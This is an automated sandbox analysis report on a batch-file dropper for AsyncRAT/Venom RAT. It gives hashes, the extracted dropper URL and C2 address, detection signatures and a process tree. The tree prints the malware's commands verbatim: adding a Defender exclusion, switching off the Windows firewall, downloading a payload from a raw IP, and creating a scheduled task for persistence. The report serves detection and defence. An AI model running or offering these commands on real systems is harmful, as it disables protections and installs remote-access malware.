Analysis

  • max time kernel
    64s
  • max time network
    65s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    25-10-2024 13:59

General

  • Target

    win10.cmd

  • Size

    3KB

  • MD5

    e62a670dce5171d5ffc8cdc9d1897f1e

  • SHA1

    1f1641255d816783f7eac72f7359dd886ddaa164

  • SHA256

    37e3fb24bc4ea36c7363a55ca99539a5c91aa5600739a652deb3fbbbcab9b2d5

  • SHA512

    f7615a367da1bfabc4cf9fad782154342c14bca6cca448b493cc3ee0328c1267f6b91beeb6e12ece409b72429eb9bb23154aaa682cb49157867b5d3c593d4557

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://72.5.43.223/gdHydhxad/win10.zip

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.2

Botnet

Default

C2

72.5.43.15:4449

Mutex

yezcydjwbxouz

Attributes
  • delay

    1

  • install

    true

  • install_file

    win.exe

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • Async RAT payload 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Executes dropped EXE 5 IoCs
  • Loads dropped DLL 4 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Detects Pyinstaller 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Delays execution with timeout.exe 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 51 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\win10.cmd"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1916
    • C:\Windows\system32\cacls.exe
      "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
      2⤵
        PID:2300
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2396
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -command "netsh advfirewall set allprofiles state off"
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2472
        • C:\Windows\system32\netsh.exe
          "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
          3⤵
          • Modifies Windows Firewall
          • Event Triggered Execution: Netsh Helper DLL
          PID:2768
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Powershell -Command "Invoke-Webrequest 'www.google.nl' -OutFile C:\Users\Admin\AppData\Local\Temp\tmp.nl"
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2252
      • C:\Windows\system32\cscript.exe
        cscript /nologo C:\Users\Admin\AppData\Local\Temp\temprunner.vbs
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2660
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\batman.cmd
          3⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:2676
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command "(New-Object Net.WebClient).DownloadFile('http://72.5.43.223/gdHydhxad/win10.zip', 'C:\Users\Admin\AppData\Local\Temp/win10.zip')"
            4⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1640
          • C:\Windows\system32\cscript.exe
            cscript //nologo "C:\Users\Admin\AppData\Local\Temp\unzi.vbs"
            4⤵
            • Suspicious use of FindShellTrayWindow
            PID:2080
          • C:\Users\Admin\AppData\Local\Temp\runtime.exe
            "C:\Users\Admin\AppData\Local\Temp\runtime.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1396
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "win" /tr '"C:\Users\Admin\AppData\Roaming\win.exe"' & exit
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:1908
              • C:\Windows\system32\schtasks.exe
                schtasks /create /f /sc onlogon /rl highest /tn "win" /tr '"C:\Users\Admin\AppData\Roaming\win.exe"'
                6⤵
                • Scheduled Task/Job: Scheduled Task
                PID:1084
            • C:\Windows\system32\cmd.exe
              cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpE0ED.tmp.bat""
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:2548
              • C:\Windows\system32\timeout.exe
                timeout 3
                6⤵
                • Delays execution with timeout.exe
                PID:1256
              • C:\Users\Admin\AppData\Roaming\win.exe
                "C:\Users\Admin\AppData\Roaming\win.exe"
                6⤵
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of SetWindowsHookEx
                PID:1452
          • C:\Users\Admin\AppData\Local\Temp\win10.exe
            "C:\Users\Admin\AppData\Local\Temp\win10.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:1976
            • C:\Users\Admin\AppData\Local\Temp\win10.exe
              "C:\Users\Admin\AppData\Local\Temp\win10.exe"
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              PID:2960

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\batman.cmd

      Filesize

      480B

      MD5

      5ce986fa2a790561fd07738b25cb0eba

      SHA1

      42d06ebaf390356aea8e6830641bb3b22c24ba91

      SHA256

      88a7a91b5c198a53e6ed7ec4c269adf5765fd208bf7c9b117da255f828dd9a6b

      SHA512

      acc2ba285e6ecdec0f0d40e529c1ae085f5fd6d869f08b90b5b582b68265a6509df744d635c7e5fe0309153d344a614ca628e5d51d5727c457b9b2154d6940eb

    • C:\Users\Admin\AppData\Local\Temp\runtime.exe

      Filesize

      73KB

      MD5

      4fa7b1eec1fc84eb3a13c29e5a37aae7

      SHA1

      dfff9fceeb4d74d7e82f9f0a65d1889fa0f9e326

      SHA256

      5f5aa560b9b2d9f7ea3b9a4e05b9b9b35107dc78bd763000fe05f6b3f998f311

      SHA512

      5e36a5589499a3db56d78de1b66a9ee57a2972bc57bf4b915df9118fd2a584c74ba00c61531d922431b72e87f9c53585c4c1a78a2aba122a22ea5e3603aa06ba

    • C:\Users\Admin\AppData\Local\Temp\temprunner.vbs

      Filesize

      153B

      MD5

      cf980901c73aa6cfb5cc8353ee50ef87

      SHA1

      3a241bfc80ba171120893ce2354cf0019fee4c69

      SHA256

      118148188be80ffe226f269f9bc06cc4dbf048479ceca3f408ae1a16e61899e6

      SHA512

      4cdcc5dec7fe0cbf13d2c25cfbeaa47cd1da32a5acdde656059e0b02dba3691c31afa4989bf669ef590e431404d34462880e3018a041cd79671990acafa2fa22

    • C:\Users\Admin\AppData\Local\Temp\tmpE0ED.tmp.bat

      Filesize

      147B

      MD5

      a0a23eb6e83f7435bda9b9f1845ed486

      SHA1

      c8a3167355f7a75e9e3f99d8ba602d74009a604f

      SHA256

      205005f743cceed5e96b734d7dee1ae74c0e181f6d64ca8e2267399094289052

      SHA512

      0157301e36bbf85efa7404c1b2412ca4eb723d5bf94aad9961bf0ef89db83be9be9fd59210f3a198dfc3bc9d455e19886ffbb3734a17cb7c9c5f722f58519c20

    • C:\Users\Admin\AppData\Local\Temp\unzi.vbs

      Filesize

      443B

      MD5

      e12da1d567a5f3d33452903f44ad30fe

      SHA1

      30df139b3ab3f1f050152e4566d4421149458638

      SHA256

      e61f086a6d387145b79c4e220b6a0772e992923068c7e22baa3e459298b08568

      SHA512

      6e9c575cadcd2739b2b8511beb8a590744d81572331ad004097fe6d02d25412fd58425b8e70f016a79fa5495e75dd6d7c48599d3369fa0923638072a4c845ace

    • C:\Users\Admin\AppData\Local\Temp\win10.exe

      Filesize

      14.7MB

      MD5

      eba7aa775fcfec357583fd4803fa60d2

      SHA1

      94a3667f7b137e305aa45fb9d2cd3578fca8255b

      SHA256

      e69138b703cdc4bf16367c468b9af1b5b7b56dbe2331ca1c34b46f7bad43ffe4

      SHA512

      e0b8e105faa612287b6078f932ba5dce74af5489533d29104de198638c905391c7a0009f18e02dc148ace84ff0f7e283cd307f95234ebe6c59e628e99935641f

    • C:\Users\Admin\AppData\Local\Temp\win10.zip

      Filesize

      14.5MB

      MD5

      902aa8d1b070f89752a003b87acd57a4

      SHA1

      6ee72c2177abb3ccb56993eb0c0bf3314661fe19

      SHA256

      262591e77da99450016dfd15ab19d5f84e577f567d47e15ebe4f7dbe935980ef

      SHA512

      28ce31a3bd969c66bfbe0c42eaafd2f4b0ad7d0506f04c0019138832747c733a4021cb054bfe9c43425fa675b1a73bd4ceaa3040a7b865e58af5e74c20bdb91d

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

      Filesize

      7KB

      MD5

      3e09c7795a644448b00c8954719457cb

      SHA1

      f03cd7a656a4e3d17201e186e2ac1d766a5c14d2

      SHA256

      fdd0ff4c77a1a106a621f82150db8ef3e569c2ba1a59d16a375db59b0df36391

      SHA512

      2238da47b0438d89ed32633fea8508ab400fa2d2e4e5343211ade865609b506c174d295595ae18edd552349e2b9599f9aea5452592666fe14b04bf8758559700

    • C:\Users\Admin\AppData\Roaming\MyData\DataLogs.conf

      Filesize

      8B

      MD5

      cf759e4c5f14fe3eec41b87ed756cea8

      SHA1

      c27c796bb3c2fac929359563676f4ba1ffada1f5

      SHA256

      c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761

      SHA512

      c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b

    • \??\PIPE\srvsvc

      MD5

      d41d8cd98f00b204e9800998ecf8427e

      SHA1

      da39a3ee5e6b4b0d3255bfef95601890afd80709

      SHA256

      e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

      SHA512

      cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

    • \Users\Admin\AppData\Local\Temp\_MEI19762\python310.dll

      Filesize

      1.4MB

      MD5

      08812511e94ad9859492a8d19cafa63e

      SHA1

      492b9fefb9cc5c7f80681ebfa373d48b3a600747

      SHA256

      9742af9d1154293fa4c4fc50352430c22d56e8cdc99202c78533af182d96489c

      SHA512

      6f7e41f4e2f893841329ac62315809a59a8d01ca047cb5739eb7ac1294afd4de2754549f7b1f5f9affa3397e9de379c5f6396844fc4fab9328362566225ddb8e

    • memory/1396-70-0x0000000000A10000-0x0000000000A28000-memory.dmp

      Filesize

      96KB

    • memory/1452-180-0x0000000000C20000-0x0000000000C38000-memory.dmp

      Filesize

      96KB

    • memory/2396-8-0x000007FEF6810000-0x000007FEF71AD000-memory.dmp

      Filesize

      9.6MB

    • memory/2396-10-0x0000000002BFB000-0x0000000002C62000-memory.dmp

      Filesize

      412KB

    • memory/2396-11-0x000007FEF6810000-0x000007FEF71AD000-memory.dmp

      Filesize

      9.6MB

    • memory/2396-9-0x000007FEF6810000-0x000007FEF71AD000-memory.dmp

      Filesize

      9.6MB

    • memory/2396-7-0x000007FEF6810000-0x000007FEF71AD000-memory.dmp

      Filesize

      9.6MB

    • memory/2396-4-0x000007FEF6ACE000-0x000007FEF6ACF000-memory.dmp

      Filesize

      4KB

    • memory/2396-5-0x000000001B620000-0x000000001B902000-memory.dmp

      Filesize

      2.9MB

    • memory/2396-6-0x0000000002070000-0x0000000002078000-memory.dmp

      Filesize

      32KB

    • memory/2472-17-0x000000001B690000-0x000000001B972000-memory.dmp

      Filesize

      2.9MB

    • memory/2472-18-0x00000000026E0000-0x00000000026E8000-memory.dmp

      Filesize

      32KB

    • memory/2960-165-0x000007FEF2DE0000-0x000007FEF3246000-memory.dmp

      Filesize

      4.4MB